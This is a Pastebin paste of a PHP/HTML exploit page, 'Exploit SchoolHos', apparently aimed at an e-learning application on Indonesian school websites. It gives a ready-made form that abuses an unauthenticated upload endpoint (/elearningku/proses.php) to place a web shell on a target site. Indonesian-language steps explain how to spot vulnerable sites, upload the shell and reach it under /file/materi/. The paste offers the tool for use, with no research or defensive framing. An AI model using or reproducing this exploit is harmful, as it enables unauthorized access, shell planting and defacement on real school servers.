Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $target = $_POST['trgt'];
- ?>
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <title>Exploit SchoolHos - WOS</title>
- <link rel="SHORTCUT ICON" href="http://pesantrencilikindonesia.com/images/logo.png">
- </head>
- <body>
- <center>
- <h1> WithOutShadow exploit SchoolHos </h1>
- <center>
- <script type="text/javascript">
- function btn()
- {
- alert("target udah terkunci")
- }
- </script>
- <fieldset>
- <legend>eXploit area !</legend>
- <table width="80%"><tr><td>
- <form method="post">
- Target : <input type="text" id="trgt" value="http://target.sch.id" name="trgt">
- <input type="submit" onclick="btn()" value="LOCK target !" class="btn">
- </form></tr></td>
- <tr><td>
- <form method="POST" action="<?php echo "$target"; ?>/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
- Shell/file: <input type="file" id="trgt" name="fupload">
- <input type="submit" class="tombol" id="btn" value="Upload !">
- </form></tr></td>
- </table>
- </fieldset>
- <br/><br/>
- <div id="st">
- STEPS : <br/>
- 1. cek web target dengan memasukan exploit /elearningku/proses.php<br/>
- 2. jika halaman blank putih.. maka web tersebut 90% vuln (ada celah)<br/>
- 3. lalu masukan web target dan lock !<br/>
- 4.Upload shell/script yang di sediakan,jika berhasil otomatis tersenggol ke halaman depan target! <br/>
- 5. buka file kamu di http://target.com/file/materi/file-kamu.php (target.com dan file-kamu.php hanya contoh!)<br/>
- </div>
- <br><br><br>
- <div id="cp">
- CODED BY : [\]$hutdown57[\] © <?php echo date("Y"); ?> </div>
- </body>
- </html>
- <style>
- body{
- background:url("http://pesantrencilikindonesia.com/images/logo.png")no-repeat center fixed #000;
- color:#fff;
- font-family: sans-serif;
- }
- #trgt{
- color:#fff;
- background:#333;
- text-align: center;
- width: 30%;
- height:28px;
- border-radius:10px;
- }
- #btn,.btn{
- color:#000;
- background: #fff;
- width:10%;
- height:25px;
- }
- #btn:hover{
- color:#fff;
- background: #ff0000;
- }
- .btn:hover{
- color:#fff;
- background: #ff0000;
- }
- #st{
- color:#81ff00;
- text-align: left;
- font-family:cursive;
- }
- #cp{
- color:#ff0000;
- background:#fff;
- box-shadow: 0px 0px 10px #ff0000,0px 0px 20px #ff0000;
- }
- fieldset{
- color:#ff0000;
- border-radius:20px;
- }
- h1{
- color:#ff0000;
- text-shadow:0px 0px 10px #81ff00,0px 0px 30px #fff,0px 0px 50px #ff0000;
- }
- </style>
Add Comment
Please, Sign In to add comment